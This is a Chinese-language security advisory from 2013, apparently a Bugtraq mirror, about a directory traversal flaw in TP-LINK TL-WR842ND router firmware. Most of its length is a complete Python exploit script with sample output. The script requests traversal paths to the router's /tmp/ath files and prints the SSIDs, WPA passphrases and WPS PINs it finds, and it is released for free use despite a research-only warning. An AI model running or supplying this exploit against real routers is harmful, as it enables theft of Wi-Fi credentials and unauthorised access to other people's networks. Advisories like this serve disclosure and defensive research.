发布日期:2013-05-29
更新日期:2013-05-30
受影响系统:
TP-LINK TL-WR842ND 3.12.22 Build 120424 Rel.39632
TP-LINK TL-WR842ND
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60206
TP-LINK TL-WR842ND是无线宽带路由器产品。
TP-LINK TL-WR842ND 3.12.22 Build 120424 Rel.39632n及其他版本存在目录遍历漏洞,远程攻击者可利用此漏洞获取敏感信息。
<*来源:Adam Simuntis
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
'''
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis ::
If remote management is on you have full access to router configuration - if not and you're connected
to router network you can discover another configured SSID's.
Successfully tested against TP-LINK WR842ND
Firmware Version: 3.12.22 Build 120424 Rel.39632n
Feel free to use, modify and distribute.
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> python2 e.py ip:port
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis ::
:: Crafting and sending evil request..
-> ssid="some_network"
!wps_default_pin=01010101
!wpa_passphrase="secretpsk"
:: Search for another networks? (y/n)
> y
:: Searching..
:: Jumping for SSID 1..
-> ssid="another_network"
!wps_default_pin=01010101
!wpa_passphrase="another_secretpsk"
:: Jumping for SSID 2..
:: Jumping for SSID 3..
:: Jumping for SSID 4..
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`-->
'''
import requests,sys,socket
from time import sleep
data=''
data2=''
url=''
W = '\033[0m'
R = '\033[31m'
B = '\033[34m'
#KISS
def parse_data(text):
words = text.split()
for word in words :
if 'ssid' in word and 'ignore' not in word :
print W+"-> "+B+"%s" %(word)
if 'pass' in word :
print W+" !"+R+"%s" %(word)
if 'default_pin' in word :
print W+" !"+R+"%s" %(word)
print W
def make_url(host,n):
junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
return junk
if len(sys.argv) == 1 :
print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
sys.exit()
url = make_url(sys.argv[1],0)
if ':' in sys.argv[1] :
host = sys.argv[1].split(":")
else :
host = sys.argv[1]
headers={
"Host" : host[0],
"User-Agent" : "Mozzila/5.0",
"Referer" : "http://"+host[0]+"/"
}
print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
print "Adam Simuntis :: \n"
try:
print R+":: Crafting and sending evil request.."
print W
data = requests.get(url,headers=headers).content
except requests.ConnectionError, e:
print R+":! Connection error!\n"
sys.exit()
if data :
parse_data(data)
else :
print B+":! Ups.. seems to be not vulnerable"
print W
print "\n:: Search for another networks? (y/n)"
answer = raw_input("> ")
if answer=="y" or answer=="Y" :
print R+"\n:: Searching.."
print W
for i in range(1,5) :
print W+":: Jumping for SSID %s..\n" %(i)
sleep(3)
url = make_url(sys.argv[1],i)
data2 = requests.get(url,headers=headers).content
if data2 :
parse_data(data2)
else :
print B+"-> Nothing..\n"
else :
print W+"\n:: Bye!"
print